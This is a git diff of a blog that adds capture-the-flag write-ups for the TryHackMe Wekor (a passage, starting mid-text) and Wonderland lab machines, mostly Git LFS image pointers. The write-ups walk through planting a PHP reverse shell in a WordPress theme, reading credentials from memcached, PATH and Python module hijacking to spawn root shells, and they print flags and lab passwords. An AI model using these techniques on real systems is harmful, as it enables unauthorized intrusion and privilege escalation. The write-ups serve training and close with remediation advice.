FORGET TO COME BACK IN 2 WEEKS! +- Jim +``` +This does not bring me much, so I launch a page scan on this subdomain. + +![](img/image-5.webp) + +After a few seconds I finally found the WordPress site! + +![](img/image-6.webp) + +So I go to the `wp-admin` page to connect to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permission, so I test the user `yura` and it works. I can now modify the content of the 404.php page of the twentytwentyone theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). + +By accessing the following page I execute the php code : + + +```bash +http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php +``` +I now have a reverse shell, but I don't have access to the first flag. + +![](img/image-7.webp) + +So I look if I can't find a file with an interesting service to change the user. In the open ports, I find the port 11211 : + +![](img/image-8.webp) + +After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credencials of the user Orka in the cache. + +![](img/image-9.webp) + +I can now change the user and get the first flag back. + + +```bash +Orka@osboxes:~$ cat user.txt +cat user.txt +1a26a6d51c0172400add0e297608dec6 +``` +## Privilege escalation + +I start by checking the user's authorization. Interestingly, my user has the right to run the `bitcoin` script with root rights. + +![](img/image-10.webp) + +I try to launch the script but without success, it needs a password to launch it. + +![](img/image-11.webp) + +So I try to extract the strings from the program and I find the following in the result: + + +```bash +Orka@osboxes:~/Desktop$ strings bitcoin +[...] +Enter the password : +password +Access Denied... +Access Granted... + User Manual: +Maximum Amount Of BitCoins Possible To Transfer at a time : 9 +Amounts with more than one number will be stripped off! +And Lastly, be careful, everything is logged :) +Amount Of BitCoins : + Sorry, This is not a valid amount! +python /home/Orka/Desktop/transfer.py %c +[...] +``` +The password to use the program would be `password` and then there is the execution of a python script. What is interesting is the use of python without using a relative route. This combined with the fact that I have write permissions in the `/usr/sbin/python` folder which is in the `$PATH` variable, I will be able to create a custom version of the python program.ndes suivante : + + +```bash +touch /usr/sbin/python +echo '#!/bin/bash' > /usr/sbin/python +echo '/bin/bash' >> /usr/sbin/python +chmod +x /usr/sbin/python +``` +I now run the `bitcoin` program with sudo and enter the password. + +![](img/image-12.webp) + +I am now root of the machine and I can get the last flag. + + +```bash +root@osboxes:~/Desktop# cat /root/root.txt +cat /root/root.txt +f4e788f87cc3afaecbaf0f0fe9ae6ad7 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Sanitizing Inputs must be implemented to avoid SQL injections +- Use strong passwords +- Set up Memcached authentication +- Use absolute paths when using programs in scripts diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png new file mode 100644 index 0000000..3d87578 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b2af0845e1cb935f456d9760c16fdc8ab573da7d74425cb0b78aab1c2ec290a +size 37989 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp new file mode 100644 index 0000000..d798ca9 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba9e22efc1fcb2eb4cee19267ac0716b6edff8fd4a3e2288aa46200411a9b7c1 +size 33624 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png new file mode 100644 index 0000000..2edbb4b --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d41d93a8d1a4129aab20063868b0276eba78dc8cbc4fa6d2aec1913a4d008094 +size 16356 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp new file mode 100644 index 0000000..a190cc0 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dab120c1f48cf74393784e0233e89078ccda92169a4b7cb5465745321cfaa765 +size 18404 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png new file mode 100644 index 0000000..abf6ef8 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fef6f0ae37931c6d61e9396d502c6b76312862e1d6ce05ca9b1114899b40fb66 +size 64633 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp new file mode 100644 index 0000000..0976621 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2aeade34849884c6cff93e69bf1f366b111ede78b94788e75d2e3d9a30febcf +size 48802 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png new file mode 100644 index 0000000..a3ee4c2 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:114c3671044cc11c3ad5701cfbc1d3d4d10e63bd84f5311351c10e20ecfb0259 +size 9896 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp new file mode 100644 index 0000000..a622573 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b93f3100a1c246af9e5ca3db555fc692ca02285c09f448b5724f8336d315dc2 +size 9380 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png new file mode 100644 index 0000000..727b38c --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf030b66b51ce0b7385dc6084748506406ec1ee019b03abe4af9c69c60dd3050 +size 13793 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp new file mode 100644 index 0000000..5f990ef --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b263e7a95a415e72e24d06d8f249aa39045628aa7ec9fedf2f656835ce84f1ca +size 13468 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png new file mode 100644 index 0000000..81dfb6a --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bced9d847aba48b854830792a0b02a60056d882131dade37080a2b6231fff28 +size 1251849 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp new file mode 100644 index 0000000..38401b5 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:352ce698a8a951a9e00d2d26fd314fe69af9f2b0076517c69e46b73b8955f88a +size 161972 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png new file mode 100644 index 0000000..af8fc9f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ddc137dc3fda66c9c81b3ca0cee5ab1ff76e6a897b8093e4097085b050b0169 +size 49707 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp new file mode 100644 index 0000000..5a55faa --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a83873affa1ec1430a8c33622138d9395fcd05d0f05b9cfbbf6c091c5e23054 +size 41162 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png new file mode 100644 index 0000000..ceb7552 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d925edc50fb31a3d640fb2b590ad17d5ad05a29610a926f94908fb825a10236a +size 10990 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp new file mode 100644 index 0000000..298a1ad --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1188c0351d3d00fbeaa7e8ae32e50329a1c828f0a2cf3f16f1a4dc708cb1718c +size 7234 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png new file mode 100644 index 0000000..2c66461 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:945df4cd79df6df0f6b92480916b561274ca2446ee39d4fbf948f94bcdcd6cf4 +size 416267 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp new file mode 100644 index 0000000..2076b49 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2650182d839291e13e2795d732d37c68aec125ceea835987d521cb51a5424598 +size 205044 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png new file mode 100644 index 0000000..4f3c92f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5928ceafb7ac2d477ef4f8a920192450e445e52eda537954669798d58b27f9ca +size 36322 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp new file mode 100644 index 0000000..fb47b8f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729cef445acf551ec1971eba3dd54c084c06952d06e923dab6fa10056e7ee3c5 +size 33916 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png new file mode 100644 index 0000000..c5eb1fa --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01ec977fc2776bd60239d92aa82cf58f8adc717f5b3fce24d2d609e8d6a86cdf +size 18929 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp new file mode 100644 index 0000000..5a71768 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:144e56bbb7e884101fb5fae7f64a85a56ea3a2369bf188e00975bc79470d3f78 +size 22504 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png new file mode 100644 index 0000000..81f2318 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:589cc319bd281524eba53927da6e42044a1cb540782813d3498689d22c896113 +size 15054 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp new file mode 100644 index 0000000..5864b2b --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:532792dd21292c776971a3626957ff2784334b5afcf8bf1ccb02053a3d817a89 +size 24612 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png new file mode 100644 index 0000000..90e7f4e --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee4b8c5e4c4d35ccbb9bba501c525a2a59403544d5fe406da313390399084db9 +size 18854 diff --git a/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp new file mode 100644 index 0000000..41f0f0f --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d35b3859057502af3d5695fd45a5b295aae272a2a49bba0a2923e8aa452137e7 +size 18274 diff --git a/content/writeup-ctf/writeup-wonderland-thm/index.md b/content/writeup-ctf/writeup-wonderland-thm/index.md new file mode 100644 index 0000000..bf633e5 --- /dev/null +++ b/content/writeup-ctf/writeup-wonderland-thm/index.md @@ -0,0 +1,185 @@ +--- +title: "Writeup - Wonderland (THM)" +date: 2022-05-20 +slug: "writeup-wonderland-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Wonderland](https://tryhackme.com/room/wonderland) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server + +![](img/image-2.webp) + +## Exploit + +At first I start by scanning the pages of the site: + +![](img/image-3.webp) + +When I go to the `r` page, I see the following message: + +![](img/image-4.webp) + +So I do a recursive scan to see the complete tree: + + +```bash +ffuf -c -u http://10.10.188.230/FUZZ -w wordlist/common.txt -recursion -recursion-depth 6 +``` +I finally find the following page: + +![](img/image-5.webp) + +I look at the source code of the page and find a `p` tag with a style that does not display it. The content of this tag looks very much like credentials... + + +```html + + + + Enter wonderland + + + + +

Open the door and enter wonderland

+

"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."

+

Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?" +

+

"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving + the other paw, "lives a March Hare. Visit either you like: they’re both mad."

+

alice:HowDothTheLittleCrocodileImproveHisShiningTail

+ + +``` +So I try to connect via SSH : + +![](img/image-6.webp) + +I now have a shell and can retrieve the first flag. + + +```bash +alice@wonderland:~$ cat /root/user.txt +thm{"Curiouser and curiouser!"} +``` +## Privilege escalation + +Looking at the contents of the `home` folder, I find several users: + + +```bash +alice@wonderland:/home$ ls +alice hatter rabbit tryhackme +``` +I am now looking at my sudo permissions: + +![](img/image-7.webp) + +So I can run this python script with the `rabbit` user's permissions. So I look at the content of this script: + + +```bash +import random +poem = """The sun was shining on the sea, +Shining with all his might: +He did his very best to make +The billows smooth and bright — +And this was odd, because it was +[...] +And that was scarcely odd, because +They’d eaten every one.""" + +for i in range(10): + line = random.choice(poem.split("\n")) + print("The line was:\t", line) +``` +I run it to make sure I've got it right. + +![](img/image-8.webp) + +So it's a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses `random`. So I create a `random.py` file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content : + + +```bash +import pty +pty.spawn("/bin/bash") +``` +I now run the script with the following command: + +![](img/image-9.webp) + +In the folder of this new user, we find the file `teaParty`. Using the `strings` command, I can find the following readable text: + + +```bash +[...] +Welcome to the tea party! +The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him +[...] +``` +The program uses the `date` command, but interestingly, the program doesn't use an absolute path. So I'll be able to create a script with the same name, and then add the folder that contains this new script to the `$PATH` variable. + +I start by creating the script with the following content: + + +```bash +#!/bin/bash +/bin/bash +``` +Then I add the execution permissions and I add my personal folder at the beginning of the `PATH` variable. + + +```bash +chmod +x date +export PATH=/home/rabbit:$PATH +``` +I can now run the program : + +![](img/image-10.webp) + +In the personal folder of this new user I find the following file: + + +```bash +hatter@wonderland:/home/hatter$ ls +password.txt +hatter@wonderland:/home/hatter$ cat password.txt +WhyIsARavenLikeAWritingDesk? +``` +So I try to connect via SSH with this password: + +![](img/image-11.webp) + +After some research to do a privilege elevation I find nothing. So I try to run linpeas.sh. By analyzing the output of the command I find the following lines: + +![](img/image-12.webp) + +By going on the [GTFObins de Perl](https://gtfobins.github.io/gtfobins/perl/#capabilities) I find a way to make a privilege elevation. + +Using the following command, I get a root shell and I can get the last flag. + +![](img/image-13.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave passwords in HTML code +- Use absolute paths in programs +- Do not leave clear passwords in files +- Modify Perl permissions to avoid elevation of privilege.